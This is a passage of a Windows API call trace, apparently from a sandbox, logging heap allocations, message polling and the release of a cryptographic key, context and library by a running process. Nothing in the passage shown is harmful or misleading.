Size=0x4) returned 0x2e54f58 [0263.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0263.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0263.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0263.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0263.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0263.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0263.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0263.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0263.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0263.525] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0263.525] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0263.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0263.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0263.525] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0263.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0263.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0263.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0263.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0263.526] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0263.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0263.526] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e51ad8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0263.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0263.526] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0263.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0263.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0263.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0263.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0263.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0263.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0263.526] CryptDestroyKey (hKey=0xa872d0) returned 1 [0263.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0263.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0263.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0263.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0263.527] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0263.527] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0263.527] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0263.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0263.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0263.527] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0263.527] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0263.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0263.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0263.527] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0263.527] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0263.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0263.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0263.527] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0263.527] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0263.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0263.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0263.528] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0263.528] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0263.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0263.528] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0263.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0263.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0263.528] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0263.528] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0263.528] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.528] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0263.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0263.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0263.528] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0263.528] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0263.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0263.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0263.528] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0263.529] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0263.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0263.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0263.529] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0263.529] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0263.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0263.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0263.529] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0263.529] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0263.529] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0263.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0263.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0263.565] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0263.565] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0263.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0263.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0263.566] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0263.566] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0263.566] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0263.566] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69888, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0263.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0263.566] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0263.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f15c40 [0263.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a18 [0263.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0263.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0263.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0263.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0263.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0263.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0263.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0263.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0263.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0263.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0263.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0263.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0263.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0263.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0263.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0263.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0263.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0263.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0263.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0263.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0263.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0263.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0263.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0263.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0263.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0263.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0263.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0263.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0263.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0263.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0263.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0263.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0263.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0263.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0263.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0263.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0263.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0263.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0263.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0263.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0263.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0263.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0263.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0263.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0263.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f15c40 | out: hHeap=0x970000) returned 1 [0263.568] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0263.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0263.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0263.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0263.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0263.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0263.569] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0263.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0263.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0263.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b80 [0263.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0263.569] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0263.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0263.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0263.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0263.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0263.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0263.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0263.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0263.569] FreeLibrary (hLibModule=0x756e0000) returned 1 [0263.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0263.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0263.569] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0263.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0263.570] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0263.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0263.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0263.570] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0263.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0263.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0263.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0263.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0263.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0263.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0263.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0263.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0263.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e518b0 [0263.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e515c8 [0263.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51628 [0263.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0263.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51778 [0263.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0263.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0263.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51790 [0263.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0263.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0263.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0263.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0263.571] CloseHandle (hObject=0x2d0) returned 1 [0263.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0263.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0263.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be08a8 | out: hHeap=0x970000) returned 1 [0263.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0263.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0263.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0263.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0263.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0263.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0263.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0263.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0263.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0263.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0263.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0263.575] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0263.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0263.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0263.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0263.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0263.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0263.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0263.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0263.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0263.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e518b0 [0263.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e515c8 [0263.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51778 [0263.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0263.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e515e0 [0263.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0263.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0263.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51880 [0263.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0263.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0263.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 